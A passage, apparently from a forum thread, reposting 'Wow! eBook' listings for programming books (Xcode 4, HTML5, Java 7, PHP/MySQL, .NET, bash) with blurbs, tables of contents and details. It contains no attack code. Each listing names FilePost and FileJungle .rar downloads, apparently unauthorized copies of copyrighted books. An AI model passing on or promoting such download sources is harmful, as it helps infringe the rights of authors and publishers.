Language: English ISBN-10: 1597496553 ISBN-13: 978-1597496551 File Size: 5.1 MiB [h=3]E-Book[/h] [FilePost] Syngress.The.Basics.of.Hacking.and.Penetration.Testing.Aug.2011.rar [FileJungle] Syngress.The.Basics.of.Hacking.and.Penetration.Testing.Aug.2011.rar [h=3]Paper Book[/h] [Amazon] The Basics of Hacking and Penetration Testing Sursa: The Basics of Hacking and Penetration Testing | Wow! eBook - Blog
-
[h=2]Mastering Xcode 4: Develop and Design[/h] [h=3]Book Description[/h] Xcode 4 has a brand new user interface, built upon proven technologies that Apple itself uses to build Mac OS X and iOS, and that have produced over a quarter million Mac OS X and iOS apps. This project-based book introduces readers to Apple’s development environment. The book is aimed at new Mac OS X and iOS developers and assumes the reader is familiar with programming and object-oriented concepts. The book starts at the basics–how to download, install, and start using Xcode–and moves to a detailed look at building and running applications. The last part of the book covers more advanced topics, such as testing, debugging, and source-code management. With the book’s approach, readers will be able to take the projects they build during the book and adapt them for use in their own projects. Table of Contents Part I: The Basics: Getting Started with Xcode 4 1. Discovering Xcode Tools 2. Starting a Project 3. Navigating a Project 4. Getting Help Part II: Working with COCOA Applications 5. Creating User Interfaces 6. Adding Files to a Project 7. Writing Code with the Source Editor 8. Searching and Replacing 9. Basic Debugging and Analysis 10. Using the Data Model Editor 11. Customizing the Application Icon 12. Deploying an Application Part III: Going Beyond the Basics 13. Advanced Editing 14. The Build System 15. Libraries, Frameworks, and Loadable Bundles 16. Workspaces 17. Debugging and Analysis in Depth 18. Unit Testing 19. Using Scripting and Preprocessing 20. Using Instruments 21. Source Code Management Appendixes Appendix A: Managing Your iOS Devices Appendix B: Gestures and Keyboard Shortcuts Appendix C: Documentation Updates Appendix D: Other Resources [h=3]Book Details[/h] Paperback: 400 pages Publisher: Peachpit Press (September 2011) Language: English ISBN-10: 0321767527 ISBN-13: 978-0321767523 File Size: 26.6 MiB [h=3]E-Book[/h] [FilePost] Peachpit.Mastering.Xcode.4.Develop.and.Design.Sep.2011.rar [FileJungle] Peachpit.Mastering.Xcode.4.Develop.and.Design.Sep.2011.rar [h=3]Paper Book[/h] [Amazon] Mastering Xcode 4: Develop and Design Sursa: Mastering Xcode 4: Develop and Design | Wow! eBook - Blog
-
[h=2]HTML5 Mastery: Semantics, Standards, and Styling[/h] [h=3]Book Description[/h] Markup is synonymous with the development of the web, but most people only scratch the surface of its capabilities. Why settle for average HTML, when you can become an HTML5 master? That’s where this unique book comes in. It’s aimed at web designers and developers who want to take their markup even further in the exciting new directions the web has taken in multimedia, interactivity and improved semantics. HTML5 isn’t for just any web site, but for a web site that will contribute to tomorrow’s “web of data.” HTML5 Mastery will introduce the new markup elements of HTML5—including less commonly used ones—and show you where and how to use them. It also provides clever styling and scripting techniques that you can employ on your web site. It is completely standards-compliant, and up-to-date with modern web design techniques. What you’ll learn How to make the most of the new features of HTML5 How to use the new semantic tags to improve your markup How to introduce multimedia and interactivity into your pages without the need for plugins How to create fabulous forms using new HTML5 elements and client-side validation How to explore the power of associated APIs How to become a web developer skilled in the contemporary direction of web standards Who this book is for Web developers and designers who want to utilize new features of HTML5 to improve their existing skillsets. Table of Contents Getting Started: Transitioning to HTML5 Using the Right Tag for the Right Job Recognizing Semantics Form Mastery Video and Audio User Interaction CSS3 Looking Ahead [h=3]Book Details[/h] Paperback: 316 pages Publisher: friendsofED (November 2011) Language: English ISBN-10: 1430238615 ISBN-13: 978-1430238614 File Size: 9.2 MiB [h=3]E-Book[/h] [FilePost] FriendsofED.HTML5.Mastery.Nov.2011.rar [FileJungle] FriendsofED.HTML5.Mastery.Nov.2011.rar [h=3]Paper Book[/h] [Amazon] HTML5 Mastery: Semantics, Standards, and Styling Sursa: HTML5 Mastery: Semantics, Standards, and Styling | Wow! eBook - Blog
-
[h=2]Beginning Java 7[/h] [h=3]Book Description[/h] Beginning Java 7 guides you through this language and a huge assortment of platform APIs according to the following table of contents: Chapter 1: Getting Started with Java Chapter 2: Discovering Classes and Objects Chapter 3: Exploring Advanced Language Features Chapter 4: Touring Language APIs Chapter 5: Collecting Objects Chapter 6: Touring Additional Utility APIs Chapter 7: Creating and Enriching Graphical User Interfaces Chapter 8: Interacting with Filesystems Chapter 9: Interacting with Networks and Databases Chapter 10: Parsing, Creating, and Transforming XML Documents Chapter 11: Working with Web Services Chapter 12: Java 7 Meets Android Appendix A: Solutions to Exercises Appendix B: Scripting API and Dynamically Typed Language Support Appendix C: Odds and Ends Appendix D: Applications Gallery Chapter 1 introduces you to Java and begins to cover the Java language by focusing on fundamental concepts such as comments, identifiers, variables, expressions, and statements. Chapter 2 continues to explore this language by presenting all of its features for working with classes and objects. You learn about features related to class declaration and object creation, encapsulation, information hiding, inheritance, polymorphism, interfaces, and garbage collection. Chapter 3 focuses on the more advanced language features related to nested classes, packages, static imports, exceptions, assertions, annotations, generics, and enums. Additional chapters will introduce you to the few features not covered in Chapters 1 through 3. Chapter 4 largely moves away from covering language features (although it does introduce class literals and strictfp) while focusing on language-oriented APIs. You learn about Math, StrictMath, Package, Primitive Type Wrapper Classes, Reference, Reflection, String, StringBuffer and StringBuilder, Threading, BigDecimal, and BigInteger in this chapter. Chapter 5 begins to explore Java’s utility APIs by focusing largely on the Collections Framework. However, it also discusses legacy collection-oriented APIs and how to create your own collections. Chapter 6 continues to focus on utility APIs by presenting the concurrency utilities along with the Objects and Random classes. Chapter 7 moves you away from the command-line user interfaces that appear in previous chapters and toward graphical user interfaces. You first learn about the Abstract Window Toolkit foundation, and then explore the Java Foundation Classes in terms of Swing and Java 2D. Appendix C explores Accessibility and Drag and Drop. Chapter 8 explores filesystem-oriented I/O in terms of the File, RandomAccessFile, stream, and writer/reader classes. New I/O is covered in Appendix C. Chapter 9 introduces you to Java’s network APIs, such as sockets. It also introduces you to the JDBC API for interacting with databases. Chapter 10 dives into Java’s XML support by first presenting an introduction to XML (including DTDs and schemas). It next explores the SAX, DOM, StAX, XPath, and XSLT APIs. It even briefly touches on the Validation API. While exploring XPath, you encounter namespace contexts, extension functions and function resolvers, and variables and variable resolvers. Chapter 11 introduces you to Java’s support for SOAP-based and RESTful web services. In addition to providing you with the basics of these web service categories, Chapter 11 presents some advanced topics, such as working with the SAAJ API to communicate with a SOAP-based web service without having to rely on JAX-WS. You will appreciate having learned about XML in Chapter 10 before diving into this chapter. Chapter 12 helps you put to use some of the knowledge you’ve gathered in previous chapters by showing you how to use Java to write an Android app’s source code. This chapter introduces you to Android, discusses its architecture, shows you how to install necessary tools, and develops a simple app. Appendix A presents the solutions to the programming exercises that appear near the end of Chapters 1 through 12. Appendix B introduces you to Java’s Scripting API along with Java 7?s support for dynamically typed languages. Appendix C introduces you to additional APIs and architecture topics: Accessibility, ByteArrayOutputStream and ByteArrayInputStream, classloaders, Console, Desktop, Drag and Drop, Dynamic Layout, Extension Mechanism and ServiceLoader, File Partition-Space, File Permissions, Formatter, Image I/O, Internationalization, Java Native Interface, NetworkInterface and InterfaceAddress, New I/O (including NIO.2), PipedOutputStream and PipedInputStream, Preferences, Scanner, Security, Smart Card, Splash Screen, Stream Tokenizer, StringTokenizer, SwingWorker, System Tray, Timer and TimerTask, Tools and the Compiler API, Translucent and Shaped Window, and XML Digital Signature. Appendix D presents a gallery of significant applications that demonstrate various aspects of Java. Unfortunately, there are limits to how much knowledge can be crammed into a print book. For this reason, Appendixes A, B, C, and D are not included in this book’s pages. Instead, these appendixes are freely distributed as PDF files. Appendixes A and B are bundled with the book’s associated code file at the Apress website (Apress). Appendixes C and D are bundled with their respective code files on my TutorTutor.ca website at TutorTutor -- /books/bj7. Appendixes C and D are “living documents” in that I’ll occasionally add new material to them. For example, I plan to expand Appendix C by also covering Java Naming and Directory Interface, Java Sound, Remote Method Invocation and Corba, Robot, Runtime and Process, Swing Timer, and many other APIs/architecture topics (including a complete tour of Swing components). Of course, it will take time to write about these topics so don’t expect all of them to appear at once — they will slowly emerge in coming months (although smaller topics such as Robot will emerge much faster). What you’ll learn The entire Java language, including Java 7-specific features such as switch on string, try-with-resources, final rethrow, multicatch, and SafeVarargs A huge assortment of Java 7 APIs, beginning with those APIs oriented toward the language itself, and including Java 7-specific APIs such as the Fork/Join Framework, Objects, JLayer, and NIO.2 Various Java 7 tools, starting with the javac compiler and java application launcher How to create user interfaces, working with web services, and a whole lot more The basics of getting started with Android app development Who this book is for This book targets the following groups of developers: Newcomers, skilled (to some degree) in other programming languages but with no previous exposure to Java Intermediate Java developers, skilled in the fundamentals of Java prior to Java 7 and looking to increase their understanding of Java 7 language/API changes All developers looking beyond standard Java, who want to leverage Java 7 to create mobile apps via Android Even advanced Java developers may find a few items of interest [h=3]Book Details[/h] Paperback: 920 pages Publisher: Apress (November 2011) Language: English ISBN-10: 1430239093 ISBN-13: 978-1430239093 File Size: 20.7 MiB [h=3]E-Book[/h] [FilePost] Apress.Beginning.Java.7.Nov.2011.rar [FileJungle] Apress.Beginning.Java.7.Nov.2011.rar [h=3]Paper Book[/h] [Amazon] Beginning Java 7 Sursa: Beginning Java 7 | Wow! eBook - Blog
-
[h=2]PHP and MySQL for Dynamic Web Sites: Visual QuickPro Guide, 4th Edition[/h] [h=3]Book Description[/h] It hasn’t taken Web developers long to discover that when it comes to creating dynamic, database-driven Web sites, MySQL and PHP provide a winning open-source combination. Add this book to the mix, and there’s no limit to the powerful, interactive Web sites that developers can create. With step-by-step instructions, complete scripts, and expert tips to guide readers, veteran author and database designer Larry Ullman gets right down to business: After grounding readers with separate discussions of first the scripting language (PHP) and then the database program (MySQL), he goes on to cover security, sessions and cookies, and using additional Web tools, with several sections devoted to creating sample applications. This guide is indispensable for beginning to intermediate level Web designers who want to replace their static sites with something dynamic. In this edition, the bulk of the new material covers the latest features and techniques with PHP and MySQL. Also new to this edition are chapters introducing jQuery and object-oriented programming techniques. Table of Contents Introduction Chapter 1. Introduction to PHP Chapter 2. Programming with PHP Chapter 3. Creating Dynamic Web Sites Chapter 4. Introduction to MySQL Chapter 5. Introduction to SQL Chapter 6. Database Design Chapter 7. Advanced SQL and MySQL Chapter 8. Error Handling and Debugging Chapter 9. Using PHP with MySQL Chapter 10. Common Programming Techniques Chapter 11. Web Application Development Chapter 12. Cookies and Sessions Chapter 13. Security Methods Chapter 14. Perl-Compatible Regular Expressions Chapter 15. Introducing jQuery Chapter 16. An OOP Primer Chapter 17. Example—Message Board Chapter 18. Example—User Registration Chapter 19. Example—E-Commerce Appendix A. Installation [h=3]Book Details[/h] Paperback: 696 pages Publisher: Peachpit Press; 4th Edition (September 2011) Language: English ISBN-10: 0321784073 ISBN-13: 978-0321784070 File Size: 56.7 MiB [h=3]E-Book[/h] [FilePost] Peachpit.PHP.and.MySQL.for.Dynamic.Web.Sites.Visual.QuickPro.Guide.4th.Edition.Sep.2011.rar [FileJungle] Peachpit.PHP.and.MySQL.for.Dynamic.Web.Sites.Visual.QuickPro.Guide.4th.Edition.Sep.2011.rar [h=3]Paper Book[/h] [Amazon] PHP and MySQL for Dynamic Web Sites: Visual QuickPro Guide, 4th Edition Sursa: PHP and MySQL for Dynamic Web Sites: Visual QuickPro Guide, 4th Edition | Wow! eBook - Blog
-
[h=2]Programming HTML5 Applications[/h] [h=3]Book Description[/h] HTML5 is not just a replacement for plugins. It also makes the Web a first-class development environment by giving JavaScript programmers a solid foundation for building industrial-strength applications. This practical guide takes you beyond simple site creation and shows you how to build self-contained HTML5 applications that can run on mobile devices and compete with desktop apps. You’ll learn powerful JavaScript tools for exploiting HTML5 elements, and discover new methods for working with data, such as offline storage and multithreaded processing. Complete with code samples, this book is ideal for experienced JavaScript and mobile developers alike. Store session data in the browser with local storage objects Save trips to the server: store larger amounts of data with IndexedDB Give browsers limited access to a user’s system to read and upload files Take your app offline—and speed up page loading when it’s online Use Web Workers to create multithreaded applications Transfer data between browser and server more efficiently with Web Sockets Learn about HTML5 tags for forms, multimedia, graphics, and geolocation “HTML5 is all the rage these days, but it’s more than just a buzzword. Programming HTML5 Applications provides the knowledge to guide you through all the new technologies needed to make modern web applications.” –Ralph Whitbeck, cohost of The Official jQuery Podcast Table of Contents Chapter 1. The Web As Application Platform Chapter 2. The Power of JavaScript Chapter 3. Testing JavaScript Applications Chapter 4. Local Storage Chapter 5. IndexedDB Chapter 6. Files Chapter 7. Taking It Offline Chapter 8. Splitting Up Work Through Web Workers Chapter 9. Web Sockets Chapter 10. New Tags Appendix. JavaScript Tools You Should Know [h=3]Book Details[/h] Paperback: 142 pages Publisher: O’Reilly Media (November 2011) Language: English ISBN-10: 1449399088 ISBN-13: 978-1449399085 File Size: 8.4 MiB [h=3]E-Book[/h] [FilePost] Oreilly.Programming.HTML5.Applications.Nov.2011.rar [FileJungle] Oreilly.Programming.HTML5.Applications.Nov.2011.rar [h=3]Paper Book[/h] [Amazon] Programming HTML5 Applications Sursa: Programming HTML5 Applications | Wow! eBook - Blog
-
[h=2]PHP & MySQL: The Missing Manual[/h] [h=3]Book Description[/h] If you can build websites with CSS and JavaScript, this book takes you to the next level—creating dynamic, database-driven websites with PHP and MySQL. Learn how to build a database, manage your content, and interact with users through queries and web forms. With step-by-step tutorials, real-world examples, and jargon-free explanations, you’ll soon discover the power of server-side programming. The important stuff you need to know: Get a running start. Write PHP scripts and create a web form right away. Learn the language. Get up to speed on PHP and SQL syntax quickly. Build a database. Use MySQL to store user information and other data. Make it dynamic. Create pages that change with each new viewing. Be ready for mistakes. Plan error messages to help direct users. Manage your content. Use the file system to access user data, including images and other binary files. Control operations. Create an administrative interface to oversee your site. Table of Contents Part I: PHP and MySQL Basics Chapter 1. PHP: What, Why, and Where? Chapter 2. PHP Syntax: Weird and Wonderful Chapter 3. MySQL and SQL: Database and Language Part II: Dynamic Web Pages Chapter 4. Connecting PHP to MySQL Chapter 5. Better Searching with Regular Expressions Chapter 6. Generating Dynamic Web Pages Part III: From Web Pages to Web Applications Chapter 7. When Things Go Wrong (and They Will) Chapter 8. Handling Images and Complexity Chapter 9. Binary Objects and Image Loading Chapter 10. Listing, Iterating, and Administrating Part IV: Security and the Real World Chapter 11. Authentication and Authorization Chapter 12. Cookies, Sign-ins, and Ditching Crummy Pop-ups Chapter 13. Authorization and Sessions [h=3]Book Details[/h] Paperback: 498 pages Publisher: O’Reilly Media / Pogue Press (November 2011) Language: English ISBN-10: 0596515863 ISBN-13: 978-0596515867 File Size: 40.8 MiB [h=3]E-Book[/h] [FilePost] Oreilly.PHP.and.MySQL.The.Missing.Manual.Nov.2011.rar [FileJungle] Oreilly.PHP.and.MySQL.The.Missing.Manual.Nov.2011.rar [h=3]Paper Book[/h] [Amazon] PHP & MySQL: The Missing Manual Sursa: PHP & MySQL: The Missing Manual | Wow! eBook - Blog
-
[h=2]PHP Master: Write Cutting Edge Code[/h] [h=3]Book Description[/h] PHP Master is tailor-made for the PHP developer who’s serious about taking their server-side applications to the next level and who wants to really keep ahead of the game by adhering to best practice, employing the most effective object-oriented programming techniques, wrapping projects in layers of security and ensuring their code is doing its job perfectly. Create professional, dynamic applications according to an object-oriented programming blueprint Learn advanced performance evaluation techniques for maximum site efficiency Brush up on the best testing methods to refine your code and keep your applications watertight Protect your site against attacks and vulnerabilities with the latest security systems Plug in to some serious functionality with PHP’s APIs and libraries About the Author Davey Shafik is a full time PHP Developer with many year of experience in PHP and related technologies. An avid magazine writer and book author, Davey keeps his mind sharp by trying to tackle problems from a unique perspective. Lorna Mitchell is a freelance web development consultant and developer based in Leeds, UK. Lorna is a lead on the Joind.In open source project, an organizer of the PHPNW conference, and a prolific blogger. Matthew Turland has been working with PHP since 2002. He has been a technical editor for php|architect Magazine, spoken at multiple conferences, served as an instructor for php|architect training courses, and contributed to Zend Framework. He currently works for Synacor. [h=3]Book Details[/h] Paperback: 400 pages Publisher: SitePoint (October 2011) Language: English ISBN-10: 0987090879 ISBN-13: 978-0987090874 File Size: 16.4 MiB [h=3]E-Book[/h] [FilePost] Sitepoint.PHP.Master.Write.Cutting-Edge.Code.Oct.2011.rar [FileJungle] Sitepoint.PHP.Master.Write.Cutting-Edge.Code.Oct.2011.rar [h=3]Paper Book[/h] [Amazon] PHP Master: Write Cutting Edge Code Sursa: PHP Master: Write Cutting Edge Code | Wow! eBook - Blog
-
[h=2]Real World .NET, C#, and Silverlight[/h] [h=3]Book Description[/h] A team of MVP authors guides you through the .NET 4 Framework Written by a group of experienced MVPs, this unparalleled book delves into the intricate—and often daunting—world of .NET 4. Each author draws from a particular area of expertise to provide invaluable information on using the various .NET 4, C# 4, Silverlight 4, and Visual Studio tools in the real world. The authors break down the vast .NET 4 Framework into easily digestible portions to offer you a strong foundation on what makes .NET such a popular and successful framework for building a wide range of solutions. Breaks down the .NET 4 Framework into easily understandable sections Features more than a dozen MVPs serving as authors, each of whom focuses on a particular area of expertise Covers such topics as Windows Presentation Foundation, Silverlight 4, Windows Communication Foundation, ASP.NET performance, the entity framework, and more Shares C# tips and tricks and .NET architecture best practices from a team of Microsoft MVPs Real World .NET 4 and C# isthe ultimate resource for discovering and understanding the .NET 4 Framework. From the Back Cover Unparalleled advice for using the most popular tools of the .NET Framework Written by 15 experienced and knowledgeable MVPs, this unique book delves into the world of .NET 4, providing you with invaluable information on using the .NET Framework, C#, Silverlight, and Visual Studio for building a wide range of solutions or enhancing existing solutions. David Giard ASP.NET and jQuery Bill Evjen ASP.NET Performance György Balássy Ethical Hacking of ASP.NET Gill Cleeren How to Build a Real-World Silverlight 5 Application Jeremy Likness Silverlight — The Silver Lining for Line-of-Business Applications Daron Yöndem Tips and Tricks for Designers and Developers Kevin Grossnicklaus MVVM Patterns in Silverlight 4 Alex Golesh Windows Phone “Mango” for Silverlight Developers Christian Weyer Pragmatic Services Communication with WCF Dominick Baier Securing WCF Services Using the Windows Identity Foundation (WIF) Jeffrey Juday Applied .NET Task Parallel Library Vishwas Lele The WF Programming Language Christian Nagel Practical WPF Data Binding Scott Millett Driving Development with User Stories and BDD Caleb Jenkins Automated Unit Testing [h=3]Book Details[/h] Paperback: 648 pages Publisher: Wrox (November 2011) Language: English ISBN-10: 1118021967 ISBN-13: 978-1118021965 File Size: 37.2 MiB [h=3]E-Book[/h] [FilePost] Wrox.Real.World.NET.CSharp.and.Silverlight.Nov.2011.rar [FileJungle] Wrox.Real.World.NET.CSharp.and.Silverlight.Nov.2011.rar [h=3]Paper Book[/h] [Amazon] Real World .NET, C#, and Silverlight Sursa: Real World .NET, C#, and Silverlight | Wow! eBook - Blog
-
[h=2]bash Cookbook[/h] [h=3]Book Description[/h] The key to mastering any Unix system, especially Linux and Mac OS X, is a thorough knowledge of shell scripting. Scripting is a way to harness and customize the power of any Unix system, and it’s an essential skill for any Unix users, including system administrators and professional OS X developers. But beneath this simple promise lies a treacherous ocean of variations in Unix commands and standards. bash Cookbook teaches shell scripting the way Unix masters practice the craft. It presents a variety of recipes and tricks for all levels of shell programmers so that anyone can become a proficient user of the most common Unix shell — the bash shell — and cygwin or other popular Unix emulation packages. Packed full of useful scripts, along with examples that explain how to create better scripts, this new cookbook gives professionals and power users everything they need to automate routine tasks and enable them to truly manage their systems — rather than have their systems manage them. Table of Contents Chapter 1 Beginning bash Chapter 2 Standard Output Chapter 3 Standard Input Chapter 4 Executing Commands Chapter 5 Basic Scripting: Shell Variables Chapter 6 Shell Logic and Arithmetic Chapter 7 Intermediate Shell Tools I Chapter 8 Intermediate Shell Tools II Chapter 9 Finding Files: find, locate, slocate Chapter 10 Additional Features for Scripting Chapter 11 Working with Dates and Times Chapter 12 End-User Tasks As Shell Scripts Chapter 13 Parsing and Similar Tasks Chapter 14 Writing Secure Shell Scripts Chapter 15 Advanced Scripting Chapter 16 Configuring and Customizing bash Chapter 17 Housekeeping and Administrative Tasks Chapter 18 Working Faster by Typing Less Chapter 19 Tips and Traps: Common Goofs for Novices Appendix A Reference Lists Appendix B Examples Included with bash Appendix C Command-Line Processing Appendix D Revision Control Appendix E Building bash from Source [h=3]Book Details[/h] Paperback: 624 pages Publisher: O’Reilly Media (May 2007) Language: English ISBN-10: 0596526784 ISBN-13: 978-0596526788 File Size: 3.4 MiB [h=3]E-Book[/h] [FilePost] Oreilly.bash.Cookbook.May.2007.rar [FileJungle] Oreilly.bash.Cookbook.May.2007.rar [h=3]Paper Book[/h] [Amazon] bash Cookbook Sursa: bash Cookbook | Wow! eBook - Blog